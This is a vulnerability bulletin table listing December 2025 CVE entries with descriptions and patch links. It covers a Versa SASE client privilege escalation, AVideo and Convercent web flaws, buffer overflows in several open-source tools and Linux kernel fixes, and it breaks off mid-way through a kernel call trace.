| Versa Networks--SASE Client for Windows | Versa SASE Client for Windows versions released between 7.8.7 and 7.9.4 contain a local privilege escalation vulnerability in the audit log export functionality. The client communicates user-controlled file paths to a privileged service, which performs file system operations without impersonating the requesting user. Due to improper privilege handling and a time-of-check time-of-use race condition combined with symbolic link and mount point manipulation, a local authenticated attacker can coerce the service into deleting arbitrary directories with SYSTEM privileges. This can be exploited to delete protected system folders such as C:\\Config.msi and subsequently achieve execution as NT AUTHORITY\\SYSTEM via MSI rollback techniques. | 2025-12-20 | not yet calculated | CVE-2025-34290 | https://security-portal.versa-networks.com/emailbulletins/69421e33d03aafc8e5bdaf21 https://www.vulncheck.com/advisories/versa-sase-client-for-windows-arbitrary-file-deletion-leading-to-lpe |
| EQS Group GmbH--Convercent Whistleblowing Platform | The Convercent Whistleblowing Platform operated by EQS Group exposes an unauthenticated API endpoint at /GetLegalEntity that returns internal customer legal-entity names based on a supplied searchText fragment. A remote unauthenticated attacker can query the endpoint using common legal-suffix terms to enumerate Convercent tenants, identifying organizations using the platform. This disclosure can facilitate targeted phishing, extortion, or other attacks against whistleblowing programs and reveals sensitive business relationships and compliance infrastructure. | 2025-12-15 | not yet calculated | CVE-2025-34411 | https://seclists.org/fulldisclosure/2025/Dec/4 https://www.convercent.com/ https://www.eqs.com/en-us/platform-convercent-clients/ https://www.vulncheck.com/advisories/convercent-whisteblowing-platform-unauthenticated-getlegalentity-endpoing-enables-customer-enumeration |
| EQS Group GmbH--Convercent Whistleblowing Platform | The Convercent Whistleblowing Platform operated by EQS Group contains a protection mechanism failure in its browser and session handling. By default, affected deployments omit HTTP security headers such as Content-Security-Policy, Referrer-Policy, Permissions-Policy, Cross-Origin-Embedder-Policy, Cross-Origin-Opener-Policy, and Cross-Origin-Resource-Policy, and implement incomplete clickjacking protections. The application also issues session cookies with insecure or inconsistent attributes by default, including duplicate ASP.NET_SessionId values, an affinity cookie missing the Secure attribute, and mixed or absent SameSite settings. These deficiencies weaken browser-side isolation and session integrity, increasing exposure to client-side attacks, session fixation, and cross-site session leakage. | 2025-12-15 | not yet calculated | CVE-2025-34412 | https://seclists.org/fulldisclosure/2025/Dec/4 https://www.convercent.com/ https://www.eqs.com/en-us/platform-convercent-clients/ https://www.vulncheck.com/advisories/convercent-whisteblowing-platform-protection-mechanism-failure-insecure-default-browser-and-session-controls |
| World Wide Broadcast Network--AVideo | AVideo versions 14.3.1 prior to 20.1 contain an unauthenticated remote code execution vulnerability caused by predictable generation of an installation salt using PHP uniqid(). The installation timestamp is exposed via a public endpoint, and a derived hash identifier is accessible through unauthenticated API responses, allowing attackers to brute-force the remaining entropy. The recovered salt can then be used to encrypt a malicious payload supplied to a notification API endpoint that evaluates attacker-controlled input, resulting in arbitrary code execution as the web server user. | 2025-12-19 | not yet calculated | CVE-2025-34433 | https://github.com/WWBN/AVideo/commit/4a53ab2 https://github.com/WWBN/AVideo/commit/a2bdbff https://www.vulncheck.com/advisories/avideo-unauthenticated-rce-via-predictable-installation-salt https://chocapikk.com/posts/2025/avideo-security-vulnerabilities/ |
| World Wide Broadcast Network--AVideo | AVideo versions prior to 20.1 with the ImageGallery plugin enabled is vulnerable to unauthenticated file upload and deletion. Plugin endpoints responsible for managing gallery images fail to enforce authentication checks and do not validate ownership, allowing unauthenticated attackers to upload or delete images associated with any image-based video. | 2025-12-17 | not yet calculated | CVE-2025-34434 | https://github.com/WWBN/AVideo/commit/4a53ab2056 https://github.com/WWBN/AVideo/commit/c279999cbd https://www.vulncheck.com/advisories/avideo-imagegallery-plugin-unauthenticated-file-upload-and-deletion https://chocapikk.com/posts/2025/avideo-security-vulnerabilities/ |
| World Wide Broadcast Network--AVideo | AVideo versions prior to 20.1 are vulnerable to an insecure direct object reference (IDOR) that allows any authenticated user to delete media files belonging to other users. The affected endpoint validates authentication but fails to verify ownership or edit permissions for the targeted video. | 2025-12-17 | not yet calculated | CVE-2025-34435 | https://github.com/WWBN/AVideo/commit/4a53ab2056 https://github.com/WWBN/AVideo/commit/275a54268b https://www.vulncheck.com/advisories/avideo-idor-arbitrary-file-deletion https://chocapikk.com/posts/2025/avideo-security-vulnerabilities/ |
| World Wide Broadcast Network--AVideo | AVideo versions prior to 20.1 allow any authenticated user to upload files into directories belonging to other users due to an insecure direct object reference. The upload functionality verifies authentication but does not enforce ownership checks. | 2025-12-17 | not yet calculated | CVE-2025-34436 | https://github.com/WWBN/AVideo/commit/4a53ab2056 https://github.com/WWBN/AVideo/commit/c279999cbd https://www.vulncheck.com/advisories/avideo-idor-arbitrary-file-upload https://chocapikk.com/posts/2025/avideo-security-vulnerabilities/ |
| World Wide Broadcast Network--AVideo | AVideo versions prior to 20.1 permit any authenticated user to upload comment images to videos owned by other users. The endpoint validates authentication but omits ownership checks, allowing attackers to perform unauthorized uploads to arbitrary video objects. | 2025-12-17 | not yet calculated | CVE-2025-34437 | https://github.com/WWBN/AVideo/commit/4a53ab2056 https://github.com/WWBN/AVideo/commit/d411f91805 https://www.vulncheck.com/advisories/avideo-idor-arbitrary-comment-image-upload https://chocapikk.com/posts/2025/avideo-security-vulnerabilities/ |
| World Wide Broadcast Network--AVideo | AVideo versions prior to 20.1 contain an insecure direct object reference vulnerability allowing users with upload permissions to modify the rotation metadata of any video. The endpoint verifies upload capability but fails to enforce ownership or management rights for the targeted video. | 2025-12-17 | not yet calculated | CVE-2025-34438 | https://github.com/WWBN/AVideo/commit/4a53ab2056 https://github.com/WWBN/AVideo/commit/c2feaf25cb https://www.vulncheck.com/advisories/avideo-idor-arbirary-video-rotation https://chocapikk.com/posts/2025/avideo-security-vulnerabilities/ |
| World Wide Broadcast Network--AVideo | AVideo versions prior to 20.1 are vulnerable to an open redirect flaw due to missing validation of the cancelUri parameter during user login. An attacker can craft a link to redirect users to arbitrary external sites, enabling phishing attacks. | 2025-12-17 | not yet calculated | CVE-2025-34439 | https://github.com/WWBN/AVideo/commit/4a53ab2056 https://github.com/WWBN/AVideo/commit/88bc40427b https://www.vulncheck.com/advisories/avideo-open-redirect-via-canceluri-parameter https://chocapikk.com/posts/2025/avideo-security-vulnerabilities/ |
| World Wide Broadcast Network--AVideo | AVideo versions prior to 20.1 contain an open redirect vulnerability caused by insufficient validation of the siteRedirectUri parameter during user registration. Attackers can redirect users to external sites, facilitating phishing attacks. | 2025-12-17 | not yet calculated | CVE-2025-34440 | https://github.com/WWBN/AVideo/commit/4a53ab2056 https://github.com/WWBN/AVideo/commit/77c70019b0 https://www.vulncheck.com/advisories/avideo-open-redirect-via-siteredirecturi-parameter https://chocapikk.com/posts/2025/avideo-security-vulnerabilities/ |
| World Wide Broadcast Network--AVideo | AVideo versions prior to 20.1 expose sensitive user information through an unauthenticated public API endpoint. Responses include emails, usernames, administrative status, and last login times, enabling user enumeration and privacy violations. | 2025-12-17 | not yet calculated | CVE-2025-34441 | https://github.com/WWBN/AVideo/commit/4a53ab2056 https://github.com/WWBN/AVideo/commit/1416c517e2 https://www.vulncheck.com/advisories/avideo-user-information-disclosure-via-public-api https://chocapikk.com/posts/2025/avideo-security-vulnerabilities/ |
| World Wide Broadcast Network--AVideo | AVideo versions prior to 20.1 disclose absolute filesystem paths via multiple public API endpoints. Returned metadata includes full server paths to media files, revealing underlying filesystem structure and facilitating more effective attack chains. | 2025-12-17 | not yet calculated | CVE-2025-34442 | https://github.com/WWBN/AVideo/commit/4a53ab2056 https://github.com/WWBN/AVideo/commit/dbe3e91c54 https://www.vulncheck.com/advisories/avideo-system-path-disclosure-via-public-api https://chocapikk.com/posts/2025/avideo-security-vulnerabilities/ |
| Genymobile--scrcpy | Genymobile/scrcpy versions up to and including 3.3.3 and prior to commit 3e40b24 contain a global buffer overflow vulnerability in the function sc_read32be, invoked via sc_device_msg_deserialize() and process_msgs(). Processing crafted device messages can cause reads beyond the bounds of a global buffer, leading to memory corruption or crashes. This vulnerability can be exploited to cause a denial of service and, under certain conditions, may be leveraged for further exploitation depending on the execution environment and available mitigations. | 2025-12-18 | not yet calculated | CVE-2025-34449 | https://github.com/marlinkcyber/advisories/blob/main/advisories/MCSAID-2025-003-scrcpy-global-buffer-overflow.md https://github.com/Genymobile/scrcpy/issues/6415 https://github.com/Genymobile/scrcpy/commit/3e40b24 https://www.vulncheck.com/advisories/genymobile-scrcpy-global-buffer-overflow |
| merbanan--rtl_433 | merbanan/rtl_433 versions up to and including 25.02 and prior to commit 25e47f8 contain a stack-based buffer overflow vulnerability in the function parse_rfraw() located in src/rfraw.c. When processing crafted or excessively large raw RF input data, the application may write beyond the bounds of a stack buffer, resulting in memory corruption or a crash. This vulnerability can be exploited to cause a denial of service and, under certain conditions, may be leveraged for further exploitation depending on the execution environment and available mitigations. | 2025-12-18 | not yet calculated | CVE-2025-34450 | https://github.com/marlinkcyber/advisories/blob/main/advisories/MCSAID-2025-004-rtl_433-rfraw-parse-overflow.md https://github.com/merbanan/rtl_433/issues/3375 https://github.com/dd32/rtl_433/commit/25e47f8 https://www.vulncheck.com/advisories/merbanan-rtl-433-stack-based-buffer-overflow |
| rofl0r--proxychains-ng | rofl0r/proxychains-ng versions up to and including 4.17 and prior to commit cc005b7 contain a stack-based buffer overflow vulnerability in the function proxy_from_string() located in src/libproxychains.c. When parsing crafted proxy configuration entries containing overly long username or password fields, the application may write beyond the bounds of fixed-size stack buffers, leading to memory corruption or crashes. This vulnerability may allow denial of service and, under certain conditions, could be leveraged for further exploitation depending on the execution environment and applied mitigations. | 2025-12-18 | not yet calculated | CVE-2025-34451 | https://github.com/marlinkcyber/advisories/blob/main/advisories/MCSAID-2025-008-proxychains-ng-stack-buffer-overflow-proxy_from_string.md https://github.com/rofl0r/proxychains-ng/issues/606 https://github.com/httpsgithu/proxychains-ng/commit/cc005b7 https://www.vulncheck.com/advisories/rofl0r-proxychains-ng-stack-based-buffer-overflow |
| Streama--Streama | Streama versions 1.10.0 through 1.10.5 and prior to commit b7c8767 contain a combination of path traversal and server-side request forgery (SSRF) vulnerabilities in that allow an authenticated attacker to write arbitrary files to the server filesystem. The issue exists in the subtitle download functionality, where user-controlled parameters are used to fetch remote content and construct file paths without proper validation. By supplying a crafted subtitle download URL and a path traversal sequence in the file name, an attacker can write files to arbitrary locations on the server, potentially leading to remote code execution. | 2025-12-18 | not yet calculated | CVE-2025-34452 | https://github.com/streamaserver/streama/commit/b7c8767 https://chocapikk.com/posts/2025/streama-path-traversal-ssrf/ https://www.vulncheck.com/advisories/streama-subtitle-download-path-traversal-and-ssrf-leading-to-arbitrary-file-write |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: arch_topology: Fix incorrect error check in topology_parse_cpu_capacity() Fix incorrect use of PTR_ERR_OR_ZERO() in topology_parse_cpu_capacity() which causes the code to proceed with NULL clock pointers. The current logic uses !PTR_ERR_OR_ZERO(cpu_clk) which evaluates to true for both valid pointers and NULL, leading to potential NULL pointer dereference in clk_get_rate(). Per include/linux/err.h documentation, PTR_ERR_OR_ZERO(ptr) returns: "The error code within @ptr if it is an error pointer; 0 otherwise." This means PTR_ERR_OR_ZERO() returns 0 for both valid pointers AND NULL pointers. Therefore !PTR_ERR_OR_ZERO(cpu_clk) evaluates to true (proceed) when cpu_clk is either valid or NULL, causing clk_get_rate(NULL) to be called when of_clk_get() returns NULL. Replace with !IS_ERR_OR_NULL(cpu_clk) which only proceeds for valid pointers, preventing potential NULL pointer dereference in clk_get_rate(). | 2025-12-16 | not yet calculated | CVE-2025-40346 | https://git.kernel.org/stable/c/64da320252e43456cc9ec3055ff567f168467b37 https://git.kernel.org/stable/c/02fbea0864fd4a863671f5d418129258d7159f68 https://git.kernel.org/stable/c/a77f8434954cb1e9c42c3854e40855fdcf5ab235 https://git.kernel.org/stable/c/3373f263bb647fcc3b5237cfaef757633b9ee25e https://git.kernel.org/stable/c/45379303124487db3a81219af7565d41f498167f https://git.kernel.org/stable/c/3a01b2614e84361aa222f67bc628593987e5cdb2 https://git.kernel.org/stable/c/2eead19334516c8e9927c11b448fbe512b1f18a1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: enetc: fix the deadlock of enetc_mdio_lock After applying the workaround for err050089, the LS1028A platform experiences RCU stalls on RT kernel. This issue is caused by the recursive acquisition of the read lock enetc_mdio_lock. Here list some of the call stacks identified under the enetc_poll path that may lead to a deadlock: enetc_poll -> enetc_lock_mdio -> enetc_clean_rx_ring OR napi_complete_done -> napi_gro_receive -> enetc_start_xmit -> enetc_lock_mdio -> enetc_map_tx_buffs -> enetc_unlock_mdio -> enetc_unlock_mdio After enetc_poll acquires the read lock, a higher-priority writer attempts to acquire the lock, causing preemption. The writer detects that a read lock is already held and is scheduled out. However, readers under enetc_poll cannot acquire the read lock again because a writer is already waiting, leading to a thread hang. Currently, the deadlock is avoided by adjusting enetc_lock_mdio to prevent recursive lock acquisition. | 2025-12-16 | not yet calculated | CVE-2025-40347 | https://git.kernel.org/stable/c/2781ca82ce8cad263d80b617addb727e6a84c9e5 https://git.kernel.org/stable/c/1f92f5bd057a4fad9dab6af17963cdd21e5da6ed https://git.kernel.org/stable/c/2e55a49dc3b2a6b23329e4fbbd8a5feb20e220aa https://git.kernel.org/stable/c/50bd33f6b3922a6b760aa30d409cae891cec8fb5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: slab: Avoid race on slab->obj_exts in alloc_slab_obj_exts If two competing threads enter alloc_slab_obj_exts() and one of them fails to allocate the object extension vector, it might override the valid slab->obj_exts allocated by the other thread with OBJEXTS_ALLOC_FAIL. This will cause the thread that lost this race and expects a valid pointer to dereference a NULL pointer later on. Update slab->obj_exts atomically using cmpxchg() to avoid slab->obj_exts overrides by racing threads. Thanks for Vlastimil and Suren's help with debugging. | 2025-12-16 | not yet calculated | CVE-2025-40348 | https://git.kernel.org/stable/c/c7af5300d78460fc5037ddc77113ba3dbfe77dc0 https://git.kernel.org/stable/c/7c34feda6a9a203c9744281f1b6671b7dad2012d https://git.kernel.org/stable/c/6ed8bfd24ce1cb31742b09a3eb557cd008533eec |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: hfs: validate record offset in hfsplus_bmap_alloc hfsplus_bmap_alloc can trigger a crash if a record offset or length is larger than node_size [ 15.264282] BUG: KASAN: slab-out-of-bounds in hfsplus_bmap_alloc+0x887/0x8b0 [ 15.265192] Read of size 8 at addr ffff8881085ca188 by task test/183 [ 15.265949] [ 15.266163] CPU: 0 UID: 0 PID: 183 Comm: test Not tainted 6.17.0-rc2-gc17b750b3ad9 #14 PREEMPT(voluntary) [ 15.266165] Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014 [ 15.266167] Call Trace: [ 15.266168] <TASK> [ 15.266169] dump_stack_lvl+0x53/0x70 [ 15.266173] print_report+0xd0/0x660 [ 15.266181] kasan_report+0xce/0x100 [ 15.266185] hfsplus_bmap_alloc+0x887/0x8b0 [ 15.266208] hfs_btree_inc_height.isra.0+0xd5/0x7c0 [ 15.266217] hfsplus_brec_insert+0x870/0xb00 [ 15.266222] __hfsplus_ext_write_extent+0x428/0x570 [ 15.266225] __hfsplus_ext_cache_extent+0x5e/0x910 [ 15.266227] hfsplus_ext_read_extent+0x1b2/0x200 [ 15.266233] hfsplus_file_extend+0x5a7/0x1000 [ 15.266237] hfsplus_get_block+0x12b/0x8c0 [ 15.266238] __block_write_begin_int+0x36b/0x12c0 [ 15.266251] block_write_begin+0x77/0x110 [ 15.266252] cont_write_begin+0x428/0x720 [ 15.266259] hfsplus_write_begin+0x51/0x100 [ 15.266262] cont_write_begin+0x272/0x720 [ 15.266270] hfsplus_write_begin+0x51/0x100 [ 15.266274] generic_perform_write+0x321/0x750 [ 15.266285] generic_file_write_iter+0xc3/0x310 [ 15.266289] __kernel_write_iter+0x2fd/0x800 [ 15.266296] dump_user_range+0x2ea/0x910 [ 15.266301] elf_core_dump+0x2a94/0x2ed0 [ 15.266320] vfs_coredump+0x1d85/0x45e0 [ 15.266349] get_signal+0x12e3/0x1990 [ 15.266357] arch_do_signal_or_restart+0x89/0x580 [ 15.266362] irqentry_exit_to_user_mode+0xab/0x110 [ 15.266364] asm_exc_page_fault+0x26/0x30 [ 15.266366] RIP: 0033:0x41bd35 [ 15.266367] Code: bc d1 f3 0f 7f 27 f3 0f 7f 6f 10 f3 0f 7f 77 20 f3 0f 7f 7f 30 49 83 c0 0f 49 29 d0 48 8d 7c 17 31 e9 9f 0b 00 00 66 0f ef c0 <f3> 0f 6f 0e f3 0f 6f 56 10 66 0f 74 c1 66 0f d7 d0 49 83 f8f [ 15.266369] RSP: 002b:00007ffc9e62d078 EFLAGS: 00010283 [ 15.266371] RAX: 00007ffc9e62d100 RBX: 0000000000000000 RCX: 0000000000000000 [ 15.266372] RDX: 00000000000000e0 RSI: 0000000000000000 RDI: 00007ffc9e62d100 [ 15.266373] RBP: 0000400000000040 R08: 00000000000000e0 R09: 0000000000000000 [ 15.266374] R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000 [ 15.266375] R13: 0000000000000000 R14: 0000000000000000 R15: 0000400000000000 [ 15.266376] </TASK> When calling hfsplus_bmap_alloc to allocate a free node, this function first retrieves the bitmap from header node and map node using node->page together with the offset and length from hfs_brec_lenoff ``` len = hfs_brec_lenoff(node, 2, &off16); off = off16; off += node->page_offset; pagep = node->page + (off >> PAGE_SHIFT); data = kmap_local_page(*pagep); ``` However, if the retrieved offset or length is invalid(i.e. exceeds node_size), the code may end up accessing pages outside the allocated range for this node. This patch adds proper validation of both offset and length before use, preventing out-of-bounds page access. Move is_bnode_offset_valid and check_and_correct_requested_length to hfsplus_fs.h, as they may be required by other functions. | 2025-12-16 | not yet calculated | CVE-2025-40349 | https://git.kernel.org/stable/c/f7d9f600c7c3ff5dab36181a388af55f2c95604c https://git.kernel.org/stable/c/40dfe7a4215a1f20842561ffaf5a6f83a987e75b https://git.kernel.org/stable/c/418e48cab99c52c1760636a4dbe464bf6db2018b https://git.kernel.org/stable/c/0058d20d76182861dbdd8fd6e2dd8d18d6d3becf https://git.kernel.org/stable/c/4f40a2b3969daf10dca4dea6f6dd0e813f79b227 https://git.kernel.org/stable/c/17ed51cfce6c62cffb97059ef392ad2e0245806e https://git.kernel.org/stable/c/068a46df3e6acc68fb9db0a6313ab379a11ecd6f https://git.kernel.org/stable/c/738d5a51864ed8d7a68600b8c0c63fe6fe5c4f20 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/mlx5e: RX, Fix generating skb from non-linear xdp_buff for striding RQ XDP programs can change the layout of an xdp_buff through bpf_xdp_adjust_tail() and bpf_xdp_adjust_head(). Therefore, the driver cannot assume the size of the linear data area nor fragments. Fix the bug in mlx5 by generating skb according to xdp_buff after XDP programs run. Currently, when handling multi-buf XDP, the mlx5 driver assumes the layout of an xdp_buff to be unchanged. That is, the linear data area continues to be empty and fragments remain the same. This may cause the driver to generate erroneous skb or triggering a kernel warning. When an XDP program added linear data through bpf_xdp_adjust_head(), the linear data will be ignored as mlx5e_build_linear_skb() builds an skb without linear data and then pull data from fragments to fill the linear data area. When an XDP program has shrunk the non-linear data through bpf_xdp_adjust_tail(), the delta passed to __pskb_pull_tail() may exceed the actual nonlinear data size and trigger the BUG_ON in it. To fix the issue, first record the original number of fragments. If the number of fragments changes after the XDP program runs, rewind the end fragment pointer by the difference and recalculate the truesize. Then, build the skb with the linear data area matching the xdp_buff. Finally, only pull data in if there is non-linear data and fill the linear part up to 256 bytes. | 2025-12-16 | not yet calculated | CVE-2025-40350 | https://git.kernel.org/stable/c/8b051d7f530e8a5237da242fbeafef02fec6b813 https://git.kernel.org/stable/c/cb9edd583e23979ee546981be963ad5f217e8b18 https://git.kernel.org/stable/c/f2557d7fa38e9475b38588f5c124476091480f53 https://git.kernel.org/stable/c/87bcef158ac1faca1bd7e0104588e8e2956d10be |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: hfsplus: fix KMSAN uninit-value issue in hfsplus_delete_cat() The syzbot reported issue in hfsplus_delete_cat(): [ 70.682285][ T9333] ===================================================== [ 70.682943][ T9333] BUG: KMSAN: uninit-value in hfsplus_subfolders_dec+0x1d7/0x220 [ 70.683640][ T9333] hfsplus_subfolders_dec+0x1d7/0x220 [ 70.684141][ T9333] hfsplus_delete_cat+0x105d/0x12b0 [ 70.684621][ T9333] hfsplus_rmdir+0x13d/0x310 [ 70.685048][ T9333] vfs_rmdir+0x5ba/0x810 [ 70.685447][ T9333] do_rmdir+0x964/0xea0 [ 70.685833][ T9333] __x64_sys_rmdir+0x71/0xb0 [ 70.686260][ T9333] x64_sys_call+0xcd8/0x3cf0 [ 70.686695][ T9333] do_syscall_64+0xd9/0x1d0 [ 70.687119][ T9333] entry_SYSCALL_64_after_hwframe+0x77/0x7f [ 70.687646][ T9333] [ 70.687856][ T9333] Uninit was stored to memory at: [ 70.688311][ T9333] hfsplus_subfolders_inc+0x1c2/0x1d0 [ 70.688779][ T9333] hfsplus_create_cat+0x148e/0x1800 [ 70.689231][ T9333] hfsplus_mknod+0x27f/0x600 [ 70.689730][ T9333] hfsplus_mkdir+0x5a/0x70 [ 70.690146][ T9333] vfs_mkdir+0x483/0x7a0 [ 70.690545][ T9333] do_mkdirat+0x3f2/0xd30 [ 70.690944][ T9333] __x64_sys_mkdir+0x9a/0xf0 [ 70.691380][ T9333] x64_sys_call+0x2f89/0x3cf0 [ 70.691816][ T9333] do_syscall_64+0xd9/0x1d0 [ 70.692229][ T9333] entry_SYSCALL_64_after_hwframe+0x77/0x7f [ 70.692773][ T9333] [ 70.692990][ T9333] Uninit was stored to memory at: [ 70.693469][ T9333] hfsplus_subfolders_inc+0x1c2/0x1d0 [ 70.693960][ T9333] hfsplus_create_cat+0x148e/0x1800 [ 70.694438][ T9333] hfsplus_fill_super+0x21c1/0x2700 [ 70.694911][ T9333] mount_bdev+0x37b/0x530 [ 70.695320][ T9333] hfsplus_mount+0x4d/0x60 [ 70.695729][ T9333] legacy_get_tree+0x113/0x2c0 [ 70.696167][ T9333] vfs_get_tree+0xb3/0x5c0 [ 70.696588][ T9333] do_new_mount+0x73e/0x1630 [ 70.697013][ T9333] path_mount+0x6e3/0x1eb0 [ 70.697425][ T9333] __se_sys_mount+0x733/0x830 [ 70.697857][ T9333] __x64_sys_mount+0xe4/0x150 [ 70.698269][ T9333] x64_sys_call+0x2691/0x3cf0 [ 70.698704][ T9333] do_syscall_64+0xd9/0x1d0 [ 70.699117][ T9333] entry_SYSCALL_64_after_hwframe+0x77/0x7f [ 70.699730][ T9333] [ 70.699946][ T9333] Uninit was created at: [ 70.700378][ T9333] __alloc_pages_noprof+0x714/0xe60 [ 70.700843][ T9333] alloc_pages_mpol_noprof+0x2a2/0x9b0 [ 70.701331][ T9333] alloc_pages_noprof+0xf8/0x1f0 [ 70.701774][ T9333] allocate_slab+0x30e/0x1390 [ 70.702194][ T9333] ___slab_alloc+0x1049/0x33a0 [ 70.702635][ T9333] kmem_cache_alloc_lru_noprof+0x5ce/0xb20 [ 70.703153][ T9333] hfsplus_alloc_inode+0x5a/0xd0 [ 70.703598][ T9333] alloc_inode+0x82/0x490 [ 70.703984][ T9333] iget_locked+0x22e/0x1320 [ 70.704428][ T9333] hfsplus_iget+0x5c/0xba0 [ 70.704827][ T9333] hfsplus_btree_open+0x135/0x1dd0 [ 70.705291][ T9333] hfsplus_fill_super+0x1132/0x2700 [ 70.705776][ T9333] mount_bdev+0x37b/0x530 [ 70.706171][ T9333] hfsplus_mount+0x4d/0x60 [ 70.706579][ T9333] legacy_get_tree+0x113/0x2c0 [ 70.707019][ T9333] vfs_get_tree+0xb3/0x5c0 [ 70.707444][ T9333] do_new_mount+0x73e/0x1630 [ 70.707865][ T9333] path_mount+0x6e3/0x1eb0 [ 70.708270][ T9333] __se_sys_mount+0x733/0x830 [ 70.708711][ T9333] __x64_sys_mount+0xe4/0x150 [ 70.709158][ T9333] x64_sys_call+0x2691/0x3cf0 [ 70.709630][ T9333] do_syscall_64+0xd9/0x1d0 [ 70.710053][ T9333] entry_SYSCALL_64_after_hwframe+0x77/0x7f [ 70.710611][ T9333] [ 70.710842][ T9333] CPU: 3 UID: 0 PID: 9333 Comm: repro Not tainted 6.12.0-rc6-dirty #17 [ 70.711568][ T9333] Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014 [ 70.712490][ T9333] ===================================================== [ 70.713085][ T9333] Disabling lock debugging due to kernel taint [ 70.713618][ T9333] Kernel panic - not syncing: kmsan.panic set ... [ 70.714159][ T9333] ---truncated--- | 2025-12-16 | not yet calculated | CVE-2025-40351 | https://git.kernel.org/stable/c/a2bee43b451615531ae6f3cf45054f02915ef885 https://git.kernel.org/stable/c/b07630afe1671096dc64064190cae3b6165cf6e4 https://git.kernel.org/stable/c/9df3c241fbf69edce968b20eeeeb3f6da34af041 https://git.kernel.org/stable/c/1b9e5ade272f8be6421c9eea4c4f6810180017f9 https://git.kernel.org/stable/c/2bb8bc99b1a7a46d83f95c46f530305f6df84eaf https://git.kernel.org/stable/c/295527bfdefd5bf31ec8218e2891a65777141d05 https://git.kernel.org/stable/c/4891bf2b09c313622a6e07d7f108aa5e123c768d https://git.kernel.org/stable/c/9b3d15a758910bb98ba8feb4109d99cc67450ee4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: platform/mellanox: mlxbf-pmc: add sysfs_attr_init() to count_clock init The lock-related debug logic (CONFIG_LOCK_STAT) in the kernel is noting the following warning when the BlueField-3 SOC is booted: BUG: key ffff00008a3402a8 has not been registered! ------------[ cut here ]------------ DEBUG_LOCKS_WARN_ON(1) WARNING: CPU: 4 PID: 592 at kernel/locking/lockdep.c:4801 lockdep_init_map_type+0x1d4/0x2a0 <snip> Call trace: lockdep_init_map_type+0x1d4/0x2a0 __kernfs_create_file+0x84/0x140 sysfs_add_file_mode_ns+0xcc/0x1cc internal_create_group+0x110/0x3d4 internal_create_groups.part.0+0x54/0xcc sysfs_create_groups+0x24/0x40 device_add+0x6e8/0x93c device_register+0x28/0x40 __hwmon_device_register+0x4b0/0x8a0 devm_hwmon_device_register_with_groups+0x7c/0xe0 mlxbf_pmc_probe+0x1e8/0x3e0 [mlxbf_pmc] platform_probe+0x70/0x110 The mlxbf_pmc driver must call sysfs_attr_init() during the initialization of the "count_clock" data structure to avoid this warning. | 2025-12-16 | not yet calculated | CVE-2025-40352 | https://git.kernel.org/stable/c/46be1f5aae82b4136f676528ff091629697c7719 https://git.kernel.org/stable/c/a7b4747d8e0e7871c3d4971cded1dcc9af6af9e9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: arm64: mte: Do not warn if the page is already tagged in copy_highpage() The arm64 copy_highpage() assumes that the destination page is newly allocated and not MTE-tagged (PG_mte_tagged unset) and warns accordingly. However, following commit 060913999d7a ("mm: migrate: support poisoned recover from migrate folio"), folio_mc_copy() is called before __folio_migrate_mapping(). If the latter fails (-EAGAIN), the copy will be done again to the same destination page. Since copy_highpage() already set the PG_mte_tagged flag, this second copy will warn. Replace the WARN_ON_ONCE(page already tagged) in the arm64 copy_highpage() with a comment. | 2025-12-16 | not yet calculated | CVE-2025-40353 | https://git.kernel.org/stable/c/5ff5765a1fc526f07d3bbaedb061d970eb13bcf4 https://git.kernel.org/stable/c/0bbf3fc6e9211fce9889fe8efbb89c220504d617 https://git.kernel.org/stable/c/b98c94eed4a975e0c80b7e90a649a46967376f58 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: increase max link count and fix link->enc NULL pointer access [why] 1.) dc->links[MAX_LINKS] array size smaller than actual requested. max_connector + max_dpia + 4 virtual = 14. increase from 12 to 14. 2.) hw_init() access null LINK_ENC for dpia non display_endpoint. (cherry picked from commit d7f5a61e1b04ed87b008c8d327649d184dc5bb45) | 2025-12-16 | not yet calculated | CVE-2025-40354 | https://git.kernel.org/stable/c/f28092be4e12b7df9e4f415d25bf0d767bc2d9ed https://git.kernel.org/stable/c/a3fc0d36cfb927f8986b83bf5fba47dbedad3c63 https://git.kernel.org/stable/c/bec947cbe9a65783adb475a5fb47980d7b4f4796 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: sysfs: check visibility before changing group attribute ownership Since commit 0c17270f9b92 ("net: sysfs: Implement is_visible for phys_(port_id, port_name, switch_id)"), __dev_change_net_namespace() can hit WARN_ON() when trying to change owner of a file that isn't visible. See the trace below: WARNING: CPU: 6 PID: 2938 at net/core/dev.c:12410 __dev_change_net_namespace+0xb89/0xc30 CPU: 6 UID: 0 PID: 2938 Comm: incusd Not tainted 6.17.1-1-mainline #1 PREEMPT(full) 4b783b4a638669fb644857f484487d17cb45ed1f Hardware name: Framework Laptop 13 (AMD Ryzen 7040Series)/FRANMDCP07, BIOS 03.07 02/19/2025 RIP: 0010:__dev_change_net_namespace+0xb89/0xc30 [...] Call Trace: <TASK> ? if6_seq_show+0x30/0x50 do_setlink.isra.0+0xc7/0x1270 ? __nla_validate_parse+0x5c/0xcc0 ? security_capable+0x94/0x1a0 rtnl_newlink+0x858/0xc20 ? update_curr+0x8e/0x1c0 ? update_entity_lag+0x71/0x80 ? sched_balance_newidle+0x358/0x450 ? psi_task_switch+0x113/0x2a0 ? __pfx_rtnl_newlink+0x10/0x10 rtnetlink_rcv_msg+0x346/0x3e0 ? sched_clock+0x10/0x30 ? __pfx_rtnetlink_rcv_msg+0x10/0x10 netlink_rcv_skb+0x59/0x110 netlink_unicast+0x285/0x3c0 ? __alloc_skb+0xdb/0x1a0 netlink_sendmsg+0x20d/0x430 ____sys_sendmsg+0x39f/0x3d0 ? import_iovec+0x2f/0x40 ___sys_sendmsg+0x99/0xe0 